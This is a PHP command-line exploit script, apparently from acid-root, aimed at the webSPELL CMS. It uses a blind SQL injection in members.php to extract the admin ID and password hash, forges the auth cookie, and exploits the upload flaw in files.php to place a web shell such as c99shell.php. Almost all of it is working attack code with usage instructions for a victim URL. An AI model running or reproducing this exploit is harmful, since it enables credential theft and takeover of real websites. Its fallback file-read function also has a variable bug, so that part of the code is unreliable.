#!/usr/bin/php URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv[0] -url <> -file <> [Options] Params: -url For example http://victim.com/webspell/ -file The file you wanna upload (c99shell.php...) Options: -prefix Table prefix (default=webs) -upmatch The match which returns TRUE for the upload -sqlmatch The match which returns TRUE for the SQL injection -proxy If you wanna use a proxy -proxyauth Basic authentification Example: $argv[0] -url http://localhost/webspell/ -file c99shell.php ----------------------------------------------------------------------- ");exit(1); } $url = getparam('url',1); $file = getparam('file',1); $prfix = (getparam('prefix')!='') ? getparam('prefix') : 'webs'; $match_upload = (getparam('upmatch')!='') ? getparam('upmatch') : '\;URL\=index\.php\?site\=files\&file\='; $match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') : 'site\=profile\&id\='; $proxy = getparam('proxy'); $authp = getparam('proxyauth'); $xpl = new phpsploit(); $xpl->agent("Mozilla Firefox"); if($proxy) $xpl->proxy($proxy); if($authp) $xpl->proxyauth($authp); print "\nAdmin id: "; $userid = blind('userID'); print "\nAdmin hash: "; $passwd = strtolower(blind('password')); print "\nLogged in (ws_auth=$userid%3A$passwd)"; $xpl->addcookie("ws_auth",$userid."%3A".$passwd); # File upload vulnerability # # +files.php # | # 42. $action = $_GET['action']; # 43. if($action=="save") { # 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3")); # 46. $upfile = $_FILES[upfile]; # 69. $filepath = "./downloads/"; # 71. $des_file = $filepath.$upfile[name]; # 72. if(!file_exists($des_file)) { # 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) { # print "\nTrying to upload the malicious file"; $frmdt = array(frmdt_url => $url.'index.php?site=files&action=save', "fileurl" => 1, "upfile" => array(frmdt_filename => basename($file), frmdt_content => file_get_contents($file))); $xpl->formdata($frmdt); if(preg_match("#$match_upload#si",$xpl->getcontent())) print "\nDone"; else print "\nFailed"; print " (${url}downloads/".basename($file).")\n"; # Simple blind SQL injection (register_globals=On) # # +members.php # | # 31. if($_GET['action']=="show") { # 32. if($_GET['squadID']) { # 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"'; # 34. } # 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort"); # function blind($field) { global $prfix,$xpl,$url,$match_blindsql; $d=0; $v=''; if(!eregi('p',$field)) { $b=47;$c=57; } # 0-9 else { $b=47;$c=70; } # 0-9a-z while(TRUE) { $d++; for($e=$b;$e<=$c;$e++) { if($e==47) $f='NULL'; else $f=$e; $sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user WHERE userID=" ."(SELECT userID FROM ${prfix}_user_groups WHERE files=1 LIMIT 1)" ." LIMIT 1),$d,1)=CHAR($f)"; $xpl->get($url."index.php?site=members&action=show&getsquad=".urlencode($sql)); if(preg_match("#$match_blindsql#",$xpl->getcontent(),$matches)) { if($e==47) { return $v; } else { print strtolower(chr($f)); $v .= chr($f); break; } } } } } function getparam($param,$opt='') { global $argv; foreach($argv as $value => $key) { if($key == '-'.$param) return $argv[$value+1]; } if($opt) exit("\n-$param parameter required"); else return; } if(!function_exists('file_get_contents')) { function file_get_contents($file) { $handle = fopen($file, "r"); $content = fread($fd, filesize($file)); fclose($handle); return $content; } } ?>